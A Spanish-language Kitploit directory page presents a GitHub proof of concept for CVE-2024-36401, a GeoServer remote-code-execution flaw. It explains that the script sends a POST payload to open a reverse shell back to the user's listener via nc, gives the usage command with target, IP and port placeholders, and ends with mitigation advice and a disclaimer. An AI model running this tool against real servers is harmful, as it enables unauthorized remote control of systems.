Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-36401 — POC para CVE-2024-36401. Este POC intentará establecer un reverse shell desde los objetivos vulnerables. | Kitploit
Herramientas/GitHubGitHub/bigb0x/cve-2024-36401
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubbigb0x/cve-2024-36401

CVE-2024-36401

POC para CVE-2024-36401. Este POC intentará establecer un reverse shell desde los objetivos vulnerables.

Ver Repositorio
34151hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

RCE para CVE-2024-36401

POC para CVE-2024-36401 GeoServer. Este POC intentará establecer un shell inverso del sistema desde los objetivos.

Banner

Resumen

POC para CVE-2024-36401: RCE para versiones de GeoServer anteriores a 2.25.1, 2.24.3 y 2.23.5. Este POC se basa en el aviso de seguridad de phith0n.

Cómo Funciona

  1. Configura un listener en tu máquina para recibir el shell inverso desde el objetivo.
  2. Este POC enviará una solicitud POST con los payloads.
  3. Intenta establecer un shell en el servidor objetivo.
  4. Esta técnica asume que nc está instalado en el objetivo.

Cómo Usar

Este POC intentará establecer un shell inverso desde los objetivos vlun. Está diseñado para funcionar contra objetivos Linux vlun. Deberás tener una máquina con una IP publicada y accesible para ejecutar este POC.

Requisitos Mínimos

  • Python 3.6 o superior
  • Biblioteca requests

Para usar este POC contra un solo objetivo:

root@kitploit:~
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type

Ayuda:

root@kitploit:~
python3 CVE-2024-36401.py  -h

options:
  -h, --help  show this help message and exit
  -u U        Target, example https://target:8080
  -ip IP      Your IP, example 192.168.1.1
  -port PORT  Port, example 1337
  -type TYPE  Type, example sf:archsites

Cómo Proteger tu Dispositivo GeoServer

1- Deshabilitar las solicitudes WFS.

2- Asegura tu Linux configurando iptables para deshabilitar conexiones inversas, establecer políticas predeterminadas para denegar todo el tráfico, permitir conexiones establecidas y relacionadas, y permitir solo tráfico saliente esencial como DNS, HTTP y HTTPS.

3- O actualizar a la última versión de GeoServer.

Contacto

Para cualquier sugerencia o idea, por favor ponte en contacto con me.

Descargo de Responsabilidad

Me gusta crear mis propias herramientas por diversión, trabajo y solo con fines educativos. No apoyo ni fomento el hacking o el acceso no autorizado a ningún sistema o red. Por favor, usa mis herramientas de manera responsable y solo en sistemas donde tengas permiso explícito para realizar pruebas.

Descargar herramienta